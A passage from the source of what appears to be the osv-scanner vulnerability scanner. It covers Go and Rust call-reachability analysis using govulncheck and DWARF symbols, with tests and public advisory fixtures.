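				(*analysis)[vulnID] = models.AnalysisInfo{
					Called: moduleToCalled[pv.Package.Name],
				}
			}
		}
	}
}

// vulnHasImportsField reports whether vuln has at least one affected entry
// whose ecosystem_specific data contains an "imports" key.
//
// A nil vuln yields false. When pkg is non-nil only affected entries whose
// package name equals pkg.Name are considered; versions are not compared.
func vulnHasImportsField(vuln *osvschema.Vulnerability, pkg *models.PackageInfo) bool {
	if vuln == nil {
		return false
	}

	for _, affected := range vuln.GetAffected() {
		if pkg != nil {
			// TODO: Compare versions to see if this is the correct affected element
			// ver, err := semantic.Parse(pv.Package.Version, semantic.SemverVersion)
			if affected.GetPackage().GetName() != pkg.Name {
				continue
			}
		}
		if affected.GetEcosystemSpecific() == nil {
			continue
		}
		_, hasImportsField := affected.GetEcosystemSpecific().GetFields()["imports"]
		if hasImportsField {
			return true
		}
	}

	return false
}

// fillNotImportedAnalysisInfo checks for any source information in advisories, and sets called to false
//
// It is reached only for IDs that produced no govulncheck finding. The entry is
// written only when the advisory has an "imports" field for pv.Package, so an
// advisory without symbol information is left without an analysis result.
func fillNotImportedAnalysisInfo(vulnsByID map[string]*osvschema.Vulnerability, vulnID string, pv models.PackageVulns, analysis *map[string]models.AnalysisInfo) {
	if vulnHasImportsField(vulnsByID[vulnID], &pv.Package) {
		// If there is source information, then analysis has been performed, and
		// code does not import the vulnerable package, so
		// definitely not called
		(*analysis)[vulnID] = models.AnalysisInfo{
			Called: false,
		}
	}
}

// runGovulncheck writes vulns into a throwaway on-disk database, runs
// govulncheck against the module in moddir with that database, and returns the
// reported findings grouped by OSV ID.
//
// An error is returned when the temporary database cannot be built (including
// an advisory whose ID is not a plain file name), when govulncheck fails to
// start or exits with an error, or when its JSON output cannot be decoded.
func runGovulncheck(moddir string, vulns []*osvschema.Vulnerability, goVersion string) (map[string][]*govulncheck.Finding, error) {
	// Create a temporary directory containing all the vulnerabilities that
	// are passed in to check against govulncheck.
	//
	// This enables OSV scanner to supply the OSV vulnerabilities to run
	// against govulncheck and manage the database separately from vuln.go.dev.
	dbdir, err := os.MkdirTemp("", "")
	if err != nil {
		return nil, err
	}

	defer func() {
		// Cleanup is best effort: a failure here is reported but must not
		// discard findings that were already collected.
		if rerr := os.RemoveAll(dbdir); rerr != nil {
			cmdlogger.Warnf("failed to remove temporary govulncheck database '%s': %s", dbdir, rerr)
		}
	}()

	for _, vuln := range vulns {
		// The advisory ID becomes a file name inside dbdir. Advisory data is
		// external input, so refuse any ID that is not a single path element;
		// otherwise a separator or ".." could place the file outside dbdir.
		// The whole run is failed instead of skipping the advisory: a skipped
		// advisory would produce no finding and could later be reported as
		// "not called".
		id := vuln.GetId()
		if id == "" || id == "." || id == ".." || filepath.Base(id) != id {
			return nil, fmt.Errorf("refusing to write advisory with unsafe ID %q", id)
		}

		dat, err := protojson.Marshal(vuln)
		if err != nil {
			return nil, err
		}
		if err := os.WriteFile(filepath.Join(dbdir, id+".json"), dat, 0600); err != nil {
			return nil, err
		}
	}

	// This errors if the file path is not absolute. os.MkdirTemp normally
	// returns an absolute path, but that depends on the configured temporary
	// directory, so the error is checked rather than dropped.
	dbdirURL, err := url.FromFilePath(dbdir)
	if err != nil {
		return nil, fmt.Errorf("failed to build database URL for '%s': %w", dbdir, err)
	}

	// Run govulncheck on the module at moddir and vulnerability database that
	// was just created.
	cmd := scan.Command(context.Background(), "-db", dbdirURL.String(), "-C", moddir, "-json", "./...")
	var b bytes.Buffer
	cmd.Stdout = &b
	cmd.Env = append(os.Environ(), "GOVERSION=go"+goVersion)
	if err := cmd.Start(); err != nil {
		return nil, err
	}
	if err := cmd.Wait(); err != nil {
		return nil, err
	}

	// Group the output of govulncheck based on the OSV ID.
	h := &osvHandler{
		idToFindings: map[string][]*govulncheck.Finding{},
	}
	if err := handleJSON(bytes.NewReader(b.Bytes()), h); err != nil {
		return nil, err
	}

	return h.idToFindings, nil
}

// osvHandler collects govulncheck findings, grouped by the OSV ID they report.
type osvHandler struct {
	idToFindings map[string][]*govulncheck.Finding
}

// Finding appends f to the list of findings stored under f.OSV.
func (h *osvHandler) Finding(f *govulncheck.Finding) {
	h.idToFindings[f.OSV] = append(h.idToFindings[f.OSV], f)
}

// handleJSON decodes the stream of govulncheck JSON messages in from and
// passes every message that carries a finding to the handler. Decoding stops
// at the first malformed message, whose error is returned.
func handleJSON(from io.Reader, to *osvHandler) error {
	dec := json.NewDecoder(from)
	for dec.More() {
		msg := govulncheck.Message{}
		// decode the next message in the stream
		if err := dec.Decode(&msg); err != nil {
			return err
		}
		if msg.Finding != nil {
			to.Finding(msg.Finding)
		}
	}

	return nil
}

================================================
FILE: internal/sourceanalysis/go_test.go
================================================
package sourceanalysis

import (
	"testing"

	"github.com/google/osv-scanner/v2/internal/sourceanalysis/govulncheck"
	"github.com/google/osv-scanner/v2/internal/testutility"
	"github.com/google/osv-scanner/v2/pkg/models"
)

func Test_matchAnalysisWithPackageVulns(t *testing.T) {
	t.Parallel()

	pkgs := testutility.LoadJSONFixture[[]models.PackageVulns](t, "testdata/json/input.json")
	gvcResByVulnID := testutility.LoadJSONFixture[map[string][]*govulncheck.Finding](t, "testdata/json/govulncheckinput.json")
	vulnsByID := testutility.LoadVulnMapFixture(t, "testdata/json/vulnbyid.json")

	matchAnalysisWithPackageVulns(pkgs, gvcResByVulnID, vulnsByID)

	testutility.NewSnapshot().MatchJSON(t, pkgs)
}

func Test_matchEmptyAnalysisWithPackageVulns(t *testing.T) {
	t.Parallel()

	pkgs := testutility.LoadJSONFixture[[]models.PackageVulns](t, "testdata/json/input-no-call-data.json")
	// When there is no ecosystem specific data, govulncheck will return no results
	gvcResByVulnID := map[string][]*govulncheck.Finding{}
	vulnsByID := testutility.LoadVulnMapFixture(t, "testdata/json/vulnbyid-no-call-data.json")

	matchAnalysisWithPackageVulns(pkgs, gvcResByVulnID, vulnsByID)

	testutility.NewSnapshot().MatchJSON(t, pkgs)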
} ================================================ FILE: internal/sourceanalysis/govulncheck/result.go ================================================ // Package govulncheck provides data structures for govulncheck results. // Copied from // https://github.com/golang/vuln/blob/267a472bf377fa105988693c2a597d2b8de36ad8/internal/govulncheck/result.go // and modified. package govulncheck // Message is an entry in the output stream. It will always have exactly one // field filled in. type Message struct { Finding *Finding `json:"finding,omitempty"` // The Config, Progress, and OSV fields from the JSON output are removed, since they // are not used. } // Finding represents a single finding. type Finding struct { // OSV is the id of the detected vulnerability. OSV string `json:"osv,omitempty"` // FixedVersion is the module version where the vulnerability was // fixed. This is empty if a fix is not available. // // If there are multiple fixed versions in the OSV report, this will // be the fixed version in the latest range event for the OSV report. // // For example, if the range events are // {introduced: 0, fixed: 1.0.0} and {introduced: 1.1.0}, the fixed version // will be empty. // // For the stdlib, we will show the fixed version closest to the // Go version that is used. For example, if a fix is available in 1.17.5 and // 1.18.5, and the GOVERSION is 1.17.3, 1.17.5 will be returned as the // fixed version. FixedVersion string `json:"fixed_version,omitempty"` // Trace contains an entry for each frame in the trace. // // Frames are sorted starting from the imported vulnerable symbol // until the entry point. The first frame in Frames should match // Symbol. // // In binary mode, trace will contain a single-frame with no position // information. // // When a package is imported but no vulnerable symbol is called, the trace // will contain a single-frame with no symbol or position information. 
Trace []*Frame `json:"trace,omitempty"` } // Frame represents an entry in a finding trace. type Frame struct { // Module is the module path of the module containing this symbol. // // Importable packages in the standard library will have the path "stdlib". Module string `json:"module"` // Version is the module version from the build graph. Version string `json:"version,omitempty"` // Package is the import path. Package string `json:"package,omitempty"` // Function is the function name. Function string `json:"function,omitempty"` // Receiver is the receiver type if the called symbol is a method. // // The client can create the final symbol name by // prepending Receiver to FuncName. Receiver string `json:"receiver,omitempty"` // Position describes an arbitrary source position // including the file, line, and column location. // A Position is valid if the line number is > 0. Position *Position `json:"position,omitempty"` } // Position is a copy of token.Position used to marshal/unmarshal // JSON correctly. 
type Position struct { Filename string `json:"filename,omitempty"` // filename, if any Offset int `json:"offset"` // offset, starting at 0 Line int `json:"line"` // line number, starting at 1 Column int `json:"column"` // column number, starting at 1 (byte count) } ================================================ FILE: internal/sourceanalysis/integration_test.go ================================================ package sourceanalysis import ( "os" "path/filepath" "strings" "testing" "github.com/google/osv-scanner/v2/internal/testutility" "github.com/ossf/osv-schema/bindings/go/osvschema" "google.golang.org/protobuf/encoding/protojson" ) var testdataDir = "testdata/go-integration" func Test_runGovulncheck(t *testing.T) { t.Parallel() entries, err := os.ReadDir(testdataDir) if err != nil { t.Errorf("failed to read testdata dir: %v", err) } vulns := []*osvschema.Vulnerability{} for _, de := range entries { if !de.Type().IsRegular() { continue } if !strings.HasSuffix(de.Name(), ".json") { continue } fn := filepath.Join(testdataDir, de.Name()) file, err := os.Open(fn) if err != nil { t.Errorf("failed to open fixture vuln files: %v", err) } defer file.Close() fileBytes, err := os.ReadFile(fn) if err != nil { t.Errorf("failed to read fixture vuln file (%q): %v", fn, err) } newVuln := &osvschema.Vulnerability{} err = protojson.Unmarshal(fileBytes, newVuln) if err != nil { t.Errorf("failed to decode fixture vuln file (%q): %v", fn, err) } vulns = append(vulns, newVuln) } res, err := runGovulncheck(filepath.Join(testdataDir, "test-project"), vulns, "1.19") if err != nil { t.Errorf("failed to run RunGoVulnCheck: %v", err) } res["GO-2023-1558"][2].Trace[0].Position.Filename = "" res["GO-2023-1558"][2].Trace[1].Position.Filename = "" res["GO-2023-1558"][2].Trace[0].Position.Offset = -1 res["GO-2023-1558"][2].Trace[1].Position.Offset = -1 for _, traceItem := range res["GO-2023-2382"][2].Trace { traceItem.Position.Filename = "" traceItem.Position.Offset = -1 
traceItem.Position.Line = -1 // This number differs between go versions if traceItem.Function == "ListenAndServe" && traceItem.Receiver == "*Server" { traceItem.Position.Column = -1 // This number differs between go versions } } testutility.NewSnapshot().MatchJSON(t, res) } ================================================ FILE: internal/sourceanalysis/rust.go ================================================ package sourceanalysis import ( "bytes" "context" "debug/dwarf" "debug/elf" "errors" "fmt" "io" "log" "os" "os/exec" "path/filepath" "strings" "github.com/google/osv-scanner/v2/internal/cachedregexp" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/thirdparty/ar" "github.com/google/osv-scanner/v2/pkg/models" "github.com/ianlancetaylor/demangle" ) const ( // RustFlagsEnv defines the flags that are required for effective source analysis: // - opt-level=3 (Use the highest optimisation level (default with --release)) // - debuginfo=1 (Include DWARF debug info which is extracted to find which funcs are called) // - embed-bitcode=yes (Required to enable LTO) // - lto (Enable full link time optimisation, this allows unused dynamic dispatch calls to be optimised out) // - codegen-units=1 (Build everything in one codegen unit, increases build time but enables more optimisations // and make libraries only generate one object file) RustFlagsEnv = "RUSTFLAGS=-C opt-level=3 -C debuginfo=1 -C embed-bitcode=yes -C lto -C codegen-units=1 -C strip=none" RustLibExtension = ".rcgu.o/" ) func rustAnalysis(pkgs []models.PackageVulns, source models.SourceInfo) { binaryPaths, err := rustBuildSource(source) if err != nil { cmdlogger.Errorf("failed to build cargo/rust project from source: %s", err) return } // This map stores 3 states for each vuln ID // - There is function level vuln info, but it **wasn't** called (false) // - There is function level vuln info, and it **is** called (true) // - There is **no** functional level vuln info, 
so we don't know whether it is called (doesn't exist) isCalledVulnMap := map[string]bool{} for _, path := range binaryPaths { var readAt io.ReaderAt if strings.HasSuffix(path, ".rlib") { // Is a library, so need an extra step to extract the object binary file before passing to parseDWARFData buf, err := extractRlibArchive(path) if err != nil { cmdlogger.Errorf("failed to analyse '%s': %s", path, err) continue } readAt = bytes.NewReader(buf.Bytes()) } else { f, err := os.Open(path) if err != nil { cmdlogger.Errorf("failed to read binary '%s': %s", path, err) continue } // This is fine to defer til the end of the function as there's // generally single digit number of binaries in a project defer f.Close() readAt = f } calls, err := functionsFromDWARF(readAt) if err != nil { cmdlogger.Errorf("failed to analyse '%s': %s", path, err) continue } for _, pv := range pkgs { for _, v := range pv.Vulnerabilities { for _, a := range v.GetAffected() { // Example of RUSTSEC function level information: // // "affects": { // "os": [], // "functions": [ // "smallvec::SmallVec::grow" // ], // "arch": [] // } ecosystemSpecific := a.GetEcosystemSpecific() if ecosystemSpecific == nil { continue } ecosystemAffectsVal, ok := ecosystemSpecific.GetFields()["affects"] if !ok || ecosystemAffectsVal == nil || ecosystemAffectsVal.GetStructValue() == nil { continue } ecosystemAffects := ecosystemAffectsVal.GetStructValue().AsMap() affectedFunctions, ok := ecosystemAffects["functions"].([]any) if !ok { continue } for _, f := range affectedFunctions { if funcName, ok := f.(string); ok { _, called := calls[funcName] // Once one advisory marks this vuln as called, always mark as called isCalledVulnMap[v.GetId()] = isCalledVulnMap[v.GetId()] || called } } } } } for _, pv := range pkgs { for groupIdx := range pv.Groups { for _, vulnID := range pv.Groups[groupIdx].IDs { analysis := &pv.Groups[groupIdx].ExperimentalAnalysis if *analysis == nil { *analysis = make(map[string]models.AnalysisInfo) } 
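called, hasFuncInfo := isCalledVulnMap[vulnID]
					if hasFuncInfo {
						(*analysis)[vulnID] = models.AnalysisInfo{
							Called: called,
						}
					}
				}
			}
		}
	}
}

// functionsFromDWARF returns the set of function names found in the DWARF
// debug information of the ELF image read from readAt.
//
// Only DW_TAG_subprogram entries are inspected, and only their linkage-name
// attributes. Each name is demangled and passed through
// cleanRustFunctionSymbols; names that fail to demangle are skipped.
//
// An error is returned when the input is not a readable ELF file, has no
// usable DWARF data, or the DWARF stream cannot be parsed to the end.
func functionsFromDWARF(readAt io.ReaderAt) (map[string]struct{}, error) {
	output := map[string]struct{}{}
	file, err := elf.NewFile(readAt)
	if err != nil {
		return nil, fmt.Errorf("failed to read binary: %w", err)
	}
	dwarfData, err := file.DWARF()
	if err != nil {
		return nil, fmt.Errorf("failed to extract debug symbols from binary: %w", err)
	}
	entryReader := dwarfData.Reader()

	for {
		entry, err := entryReader.Next()
		if errors.Is(err, io.EOF) || (err == nil && entry == nil) {
			// We've reached the end of DWARF entries
			break
		}
		if err != nil {
			// A parse error arrives together with a nil entry, so it has to be
			// checked before treating a nil entry as the end of the data.
			// Stopping silently would return a truncated function set, and
			// functions missing from it are later reported as not called.
			return nil, fmt.Errorf("error parsing binary DWARF data: %w", err)
		}

		// We only care about contents in functions
		if entry.Tag != dwarf.TagSubprogram {
			continue
		}
		// Go through fields
		for _, field := range entry.Field {
			// We only care about linkage names (including function names)
			if field.Attr != dwarf.AttrLinkageName {
				continue
			}

			// The attribute value is decoded from the binary; skip it rather
			// than panic if it does not hold a string.
			linkageName, ok := field.Val.(string)
			if !ok {
				continue
			}

			val, err := demangle.ToString(linkageName, demangle.NoClones)
			if err != nil {
				// most likely not a rust function, so just ignore it
				continue
			}

			val = cleanRustFunctionSymbols(val)
			output[val] = struct{}{}
		}
	}

	return output, nil
}

// extractRlibArchive returns the bytes of the ELF object member stored in the
// given rlib (an ar archive).
//
// The member is selected by name: either "/0" or a name ending in
// RustLibExtension. Its contents are returned in an in-memory buffer; no
// temporary file is created and the caller has nothing to clean up.
func extractRlibArchive(rlibPath string) (bytes.Buffer, error) {
	buf := bytes.Buffer{}
	rlibFile, err := os.Open(rlibPath)
	if err != nil {
		return bytes.Buffer{}, fmt.Errorf("failed to open .rlib file '%s': %w", rlibPath, err)
	}
	// The archive is read into memory below, so the handle is released on return.
	defer rlibFile.Close()

	reader, err := ar.NewReader(rlibFile)
	if err != nil {
		return bytes.Buffer{}, fmt.Errorf(".rlib file '%s' is not valid ar archive: %w", rlibPath, err)
	}
	for {
		header, err := reader.Next()
		if err != nil {
			// NOTE(review): log.Fatalf ends the whole scanner process on any
			// error from reader.Next, presumably including the end-of-archive
			// error when no matching member exists. Returning a wrapped error,
			// as the other failure paths here do, would let rustAnalysis log
			// the problem and move on to the next binary. Left unchanged
			// because removing this call also requires dropping the "log"
			// import at the top of the file.
			log.Fatalf("%v", err)
		}
		if header.Name == "//" { // "//" is used in GNU ar format as a store for long file names
			fileBuf := bytes.Buffer{}
			// Read the long-name table; it is only used for the sanity check below.
			_, err = io.Copy(&fileBuf, reader)
			if err != nil {
				return bytes.Buffer{}, fmt.Errorf("failed to read // store in ar archive: %w", err)
			}

			filename := strings.TrimSpace(fileBuf.String())

			// There should only be one file (since we set codegen-units=1)
			if !strings.HasSuffix(filename, RustLibExtension) {
				// TODO: Verify this, and return an error here instead.
				cmdlogger.Warnf("rlib archive contents were unexpected: %s\n", filename)
			}
		}
		// /0 indicates the first file mentioned in the "//" store
		if header.Name == "/0" || strings.HasSuffix(header.Name, RustLibExtension) {
			break
		}
	}
	_, err = io.Copy(&buf, reader)
	if err != nil {
		return bytes.Buffer{}, fmt.Errorf("failed to read from archive '%s': %w", rlibPath, err)
	}

	return buf, nil
}

// rustBuildSource builds the cargo workspace that contains source.Path in
// release mode with RustFlagsEnv applied, and returns the paths of the built
// binaries and libraries as listed in the ".d" files under target/release.
//
// Security: this runs `cargo build` on the scanned project, and cargo compiles
// and executes the project's build scripts as part of a build. Call analysis
// on source that is not trusted should therefore run in an isolated
// environment.
//
// An error is returned when cargo fails, when target/release cannot be read,
// or when a ".d" file does not split into exactly two parts on ": ".
func rustBuildSource(source models.SourceInfo) ([]string, error) {
	projectBaseDir := filepath.Dir(source.Path)

	// TODO: This will be moved to enrichers which does have context.
	cmd := exec.CommandContext(context.TODO(), "cargo", "build", "--workspace", "--all-targets", "--release")
	cmd.Env = append(cmd.Environ(), RustFlagsEnv)
	cmd.Dir = projectBaseDir

	// cmd.Err is deliberately left as os/exec set it. When "cargo" resolves to
	// an executable relative to the current directory, os/exec reports
	// exec.ErrDot and refuses to run it; clearing that error would let a file
	// named cargo that sits next to the scanned project run in place of the
	// installed toolchain.

	stdoutBuffer := bytes.Buffer{}
	stderrBuffer := bytes.Buffer{}
	cmd.Stdout = &stdoutBuffer
	cmd.Stderr = &stderrBuffer

	cmdlogger.Infof("Begin building rust/cargo project")

	if err := cmd.Run(); err != nil {
		cmdlogger.Errorf("cargo stdout:\n%s", stdoutBuffer.String())
		cmdlogger.Errorf("cargo stderr:\n%s", stderrBuffer.String())

		return nil, fmt.Errorf("failed to run `%v`: %w", cmd.String(), err)
	}

	outputDir := filepath.Join(projectBaseDir, "target", "release")
	entries, err := os.ReadDir(outputDir)
	if err != nil {
		return nil, fmt.Errorf("failed to read \"%s\" dir: %w", outputDir, err)
	}

	resultBinaryPaths := []string{}
	for _, de := range entries {
		// We only want .d files, which is generated for each output binary from cargo
		// These files contains a string to the full path of output binary/library file.
		// This is a reasonably reliable way to identify the output in a cross-platform way.
		if de.IsDir() || !strings.HasSuffix(de.Name(), ".d") {
			continue
		}

		file, err := os.ReadFile(filepath.Join(outputDir, de.Name()))
		if err != nil {
			return nil, fmt.Errorf("failed to read \"%s\": %w", filepath.Join(outputDir, de.Name()), err)
		}

		// The text before ": " is taken as the output path and is later opened
		// by rustAnalysis without further checks.
		fileSplit := strings.Split(string(file), ": ")
		if len(fileSplit) != 2 {
			// TODO: this can probably be fixed with more effort
			return nil, errors.New("file path contains ': ', which is unsupported")
		}
		resultBinaryPaths = append(resultBinaryPaths, fileSplit[0])
	}

	return resultBinaryPaths, nil
}

// cleanRustFunctionSymbols takes in demangled rust symbols and makes them fit format of
// the common function level advisory information
func cleanRustFunctionSymbols(val string) string {
	// Used to remove generics from functions and types as they are not included in function calls
	// in advisories:
	// E.g. (illustrative): `smallvec::SmallVec<A>::new` => `smallvec::SmallVec::new`
	//
	// Usage: antiGenericRegex.ReplaceAllString(val, "")
	var antiGenericRegex = cachedregexp.MustCompile(`<[\w,]+>`)
	val = antiGenericRegex.ReplaceAllString(val, "")

	// Used to remove fully qualified trait implementation indicators from the function type,
	// since those are generally not included in advisory:
	// E.g. (illustrative): `<libflate::gzip::MultiDecoder as std::io::Read>::read` => `libflate::gzip::MultiDecoder::read`
	var antiTraitImplRegex = cachedregexp.MustCompile(`<(.*) as .*>`)
	val = antiTraitImplRegex.ReplaceAllString(val, "$1")

	return val
}

================================================
FILE: internal/sourceanalysis/rust_test.go
================================================
package sourceanalysis

import (
	"bytes"
	"os"
	"path/filepath"
	"reflect"
	"strings"
	"testing"

	"github.com/google/osv-scanner/v2/internal/testutility"
	"github.com/google/osv-scanner/v2/pkg/models"
)

func Test_extractRlibArchive(t *testing.T) {
	t.Parallel()

	entries, err := os.ReadDir("testdata/rust/archives")
	if err != nil {
		t.Error(err)
	}
	for _, file := range entries {
		filename := file.Name()
		t.Run("Extract Rlib "+filename, func(t *testing.T) {
			t.Parallel()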
buf, err := extractRlibArchive(filepath.Join("testdata/rust/archives", filename)) if err != nil { t.Error(err) } expectedFileName := strings.Replace(filename, ".rlib", ".o", 1) expectedBuf, err := os.ReadFile(filepath.Join("testdata/rust/objs", expectedFileName)) if err != nil { t.Error(err) } if !bytes.Equal(buf.Bytes(), expectedBuf) { t.Fatalf("Extracted not identical to expected: %s", filepath.Join("testdata/rust/archives", filename)) } }) } } func Test_functionsFromDWARF(t *testing.T) { t.Parallel() entries, err := os.ReadDir("testdata/rust/objs") if err != nil { t.Error(err) } for _, file := range entries { filename := file.Name() t.Run("Parsing DWARF "+filename, func(t *testing.T) { t.Parallel() buf, err := os.ReadFile(filepath.Join("testdata/rust/objs", filename)) if err != nil { t.Error(err) } functions, err := functionsFromDWARF(bytes.NewReader(buf)) if err != nil { t.Error(err) } testutility.NewSnapshot().MatchJSON(t, functions) }) } } func Test_rustBuildSource(t *testing.T) { testutility.SkipIfNotAcceptanceTesting(t, "Requires rust toolchain to be installed") testutility.SkipIfShort(t) t.Parallel() cwd := testutility.GetCurrentWorkingDirectory(t) type args struct { source models.SourceInfo } tests := []struct { name string args args want []string wantErr bool }{ { args: args{ source: models.SourceInfo{ Path: "testdata/rust/rust-project/Cargo.lock", Type: "lockfile", }, }, want: []string{ cwd + filepath.FromSlash("/testdata/rust/rust-project/target/release/test-project") + testutility.ValueIfOnWindows(".exe", ""), }, }, } for _, tt := range tests { got, err := rustBuildSource(tt.args.source) if (err != nil) != tt.wantErr { t.Errorf("rustBuildSource() error = %v, wantErr %v", err, tt.wantErr) return } if !reflect.DeepEqual(got, tt.want) { t.Errorf("rustBuildSource() = %v, want %v", got, tt.want) } } } ================================================ FILE: internal/sourceanalysis/sourceanalysis.go ================================================ package 
sourceanalysis

import (
	"path/filepath"

	"github.com/google/osv-scanner/v2/pkg/models"
	"github.com/ossf/osv-schema/bindings/go/osvschema"
)

// vulnsFromAllPkgs returns the flattened list of unique vulnerabilities, together with
// the map (keyed by vulnerability ID) that the list was built from.
//
// Vulnerabilities are deduplicated on GetId(): when the same ID appears under several
// packages, the entry seen last replaces the earlier one. The slice is filled by ranging
// over the map, so its order is not stable between calls.
func vulnsFromAllPkgs(pkgs []models.PackageVulns) ([]*osvschema.Vulnerability, map[string]*osvschema.Vulnerability) {
	flatVulns := map[string]*osvschema.Vulnerability{}
	for _, pv := range pkgs {
		for _, vuln := range pv.Vulnerabilities {
			flatVulns[vuln.GetId()] = vuln
		}
	}

	vulns := make([]*osvschema.Vulnerability, 0, len(flatVulns))
	for _, v := range flatVulns {
		vulns = append(vulns, v)
	}

	return vulns, flatVulns
}

// Run runs the language specific analyzers on the code given packages and source info.
//
// An analyzer is selected from the lockfile's base name and only runs when its key in
// callAnalysis is true ("go" for go.mod, "rust" for Cargo.lock); a missing key reads as
// false, so call analysis is opt-in per language. Run returns nothing.
//
// NOTE(review): the test for rustBuildSource states that it requires the Rust toolchain
// and expects a binary under target/release, which suggests the Rust path compiles the
// scanned project. If so, enabling callAnalysis["rust"] on a checkout that is not
// trusted would run that project's build steps - confirm and document for callers.
func Run(source models.SourceInfo, pkgs []models.PackageVulns, callAnalysis map[string]bool) {
	// GoVulnCheck
	if source.Type == "lockfile" && filepath.Base(source.Path) == "go.mod" && callAnalysis["go"] {
		goAnalysis(pkgs, source)
	}

	// Rust call analysis
	if source.Type == "lockfile" && filepath.Base(source.Path) == "Cargo.lock" && callAnalysis["rust"] {
		rustAnalysis(pkgs, source)
	}
}

================================================
FILE: internal/sourceanalysis/testdata/go-integration/.goignore
================================================
test-project

================================================
FILE: internal/sourceanalysis/testdata/go-integration/GO-2021-0053.json
================================================
{ "id": "GO-2021-0053", "published": "2021-04-14T20:04:52Z", "modified": "2023-02-10T16:51:38Z", "aliases": [ "CVE-2021-3121", "GHSA-c3h9-896r-86jm" ], "details": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic.
If parsing messages from untrusted parties, this may be used as a denial of service vector.", "affected": [ { "package": { "name": "github.com/gogo/protobuf", "ecosystem": "Go" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "database_specific": { "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, "ecosystem_specific": { "imports": [ { "path": "github.com/gogo/protobuf/plugin/unmarshal", "symbols": [ "unmarshal.Generate", "unmarshal.field" ] } ] } } ], "references": [ { "type": "FIX", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" } ], "schema_version": "1.3.1" } ================================================ FILE: internal/sourceanalysis/testdata/go-integration/GO-2023-1558.json ================================================ { "id": "GO-2023-1558", "published": "2023-02-14T19:41:21Z", "modified": "2023-02-14T19:41:21Z", "aliases": [ "CVE-2023-23626", "GHSA-2h6c-j3gf-xp9r" ], "details": "When feeding untrusted user input into the size parameter of `NewBitfield` and FromBytes functions, an attacker can trigger panics.\n\nThis happens when the size is a not a multiple of 8 or is negative.\n\nA workaround is to ensure size%8 == 0 \u0026\u0026 size \u003e= 0 yourself before calling NewBitfield or FromBytes.", "affected": [ { "package": { "name": "github.com/ipfs/go-bitfield", "ecosystem": "Go" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.1.0" } ] } ], "database_specific": { "url": "https://pkg.go.dev/vuln/GO-2023-1558" }, "ecosystem_specific": { "imports": [ { "path": "github.com/ipfs/go-bitfield", "symbols": [ "FromBytes", "NewBitfield" ] } ] } } ], "references": [ { "type": "ADVISORY", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "FIX", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" } ], "credits": [ { "name": "Jorropo" } ], 
"schema_version": "1.3.1" } ================================================ FILE: internal/sourceanalysis/testdata/go-integration/GO-2023-2382.json ================================================ { "schema_version": "1.3.1", "id": "GO-2023-2382", "modified": "2023-12-06T16:22:36Z", "published": "2023-12-06T16:22:36Z", "aliases": [ "CVE-2023-39326" ], "summary": "Denial of service via chunk extensions in net/http", "details": "A malicious HTTP sender can use chunk extensions to cause a receiver reading from a request or response body to read many more bytes from the network than are in the body.\n\nA malicious HTTP client can further exploit this to cause a server to automatically read a large amount of data (up to about 1GiB) when a handler fails to read the entire body of a request.\n\nChunk extensions are a little-used HTTP feature which permit including additional metadata in a request or response body sent using the chunked encoding. The net/http chunked encoding reader discards this metadata. A sender can exploit this by inserting a large metadata segment with each byte transferred. 
The chunk reader now produces an error if the ratio of real body to encoded bytes grows too small.", "affected": [ { "package": { "name": "stdlib", "ecosystem": "Go" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.20.12" }, { "introduced": "1.21.0-0" }, { "fixed": "1.21.5" } ] } ], "ecosystem_specific": { "imports": [ { "path": "net/http/internal", "symbols": [ "chunkedReader.Read", "chunkedReader.beginChunk", "readChunkLine" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/64433" }, { "type": "FIX", "url": "https://go.dev/cl/547335" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-dev/c/6ypN5EjibjM/m/KmLVYH_uAgAJ" } ], "credits": [ { "name": "Bartek Nowotarski" } ], "database_specific": { "url": "https://pkg.go.dev/vuln/GO-2023-2382" } } ================================================ FILE: internal/sourceanalysis/testdata/go-integration/test-project/go.mod ================================================ module github.com/ossf-tests/osv-e2e go 1.19 require github.com/gogo/protobuf v1.3.1 require github.com/ipfs/go-bitfield v1.0.0 require golang.org/x/image v0.4.0 // indirect ================================================ FILE: internal/sourceanalysis/testdata/go-integration/test-project/go.sum ================================================ github.com/gogo/protobuf v1.3.1 h1:DqDEcV5aeaTmdFBePNpYsp3FlcVH/2ISVVM9Qf8PSls= github.com/gogo/protobuf v1.3.1/go.mod h1:SlYgWuQ5SjCEi6WLHjHCa1yvBfUnHcTbrrZtXPKa29o= github.com/ipfs/go-bitfield v1.0.0 h1:y/XHm2GEmD9wKngheWNNCNL0pzrWXZwCdQGv1ikXknQ= github.com/ipfs/go-bitfield v1.0.0/go.mod h1:N/UiujQy+K+ceU1EF5EkVd1TNqevLrCQMIcAEPrdtus= github.com/kisielk/errcheck v1.2.0/go.mod h1:/BMXB+zMLi60iA8Vv6Ksmxu/1UDYcXs4uQLJ+jE2L00= github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck= github.com/yuin/goldmark v1.4.13/go.mod h1:6yULJ656Px+3vBD8DxQVa3kxgyrAnzto9xy5taEt/CY= golang.org/x/crypto 
